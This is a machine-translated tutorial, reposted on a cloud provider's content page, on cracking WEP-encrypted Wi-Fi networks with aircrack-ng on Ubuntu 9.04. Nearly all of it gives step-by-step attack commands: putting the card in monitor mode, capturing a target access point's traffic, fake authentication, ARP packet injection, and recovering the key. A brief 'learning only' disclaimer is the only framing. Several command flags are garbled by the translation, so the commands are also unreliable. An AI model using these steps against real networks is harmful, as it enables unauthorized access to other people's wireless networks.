Attack wep encryption in Ubuntu9.04 (CODE)

Source: Internet
Author: User

Disclaimer: Refer to network content for some content in this article! For personal learning reference only! Do not use it for illegal purposes! Otherwise, the consequences have nothing to do with me! Reprinted!

Crack wep encryption in Ubuntu 9.04

System: Ubuntu9.04

Hardware: Acer 4736g 652g32nm + a usb interface Nic model support go to Baidu and Google!

Enter the desktop system, open the command terminal, and enter sudo apt-get install aircrack-ng to install aircrack-ng.

If you can not access the Internet to download the deb installation package address: http://packages.ubuntu.com/zh-cn/jaunty/i386/aircrack-ng/download

How to install Baidu and Google after the download!

1: Enter ifconfig in the terminal to view ifconfig in the terminal. Generally, wlan0 is used for external access. wlan1 is used to identify the mac address of the network card!

2: start the monitoring mode of the wireless network card. Enter sudo airmon-ng start wlan1 in the terminal.
(Wlan1 is the port of the wireless network card that supports cracking)

3: View Wireless AP input in the terminal: sudo airodump-ng mon0 (Note: After monitoring is enabled, the wireless network port is now mon0 !!!)

Check which APS using wep encryption are online. If there is a wap or wpa2 record, do not touch it. The encryption method is not suitable for this article. Keep the terminal and do not close it!

4: capture packets. Open another terminal and enter sudo airodump-ng-c 6 -- bssid target AP's MAC-w n mon0.
(6 followed by-c is the AP working channel to be cracked, -- the target AP's MAC address followed by bissid is the MAC address of the AP to be cracked, -w followed by n is the file name for storing captured DATA packets. Change the channel and MAC address according to the online AP in step 3. The file name for storing DATA can be named as needed) do not close this terminal window

5. Establish a virtual connection with the AP
Open another terminal and enter:
Sudo aireplay-ng-1 0-a target AP's MAC-h My MAC mon0
(-H is followed by the target My MAC is the MAC address of your wireless network card. Command: iwlist wlan0 scanning to view your MAC address)

6. Inject
After a virtual connection is established, enter sudo aireplay-ng-2-F-p 0841-c ff: ff-B Target AP's MAC-h My MAC mon0
Now let's look back at whether the terminal in Step 4 is starting to soar!

7. After decryption and collection of more than 5000 DATA records, open another terminal and enter sudo aircrack-ng n *. cap.
To decrypt n *. for details about cap n, refer to the file name in Step 4. (if it is not calculated, continue to wait. aircrack-ng will automatically run after each additional 5000 DATA entries, until the password is calculated)

8: Close
After the password is cracked, enter sudo airmon-ng stop mon0 in the terminal to disable the monitoring mode. Otherwise, the wireless network adapter will continue injecting the password to the AP, you cannot exit or directly close the terminal by using ctrl + c. Now you can connect to the Internet or repeat steps 1-7 to crack other APs.

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.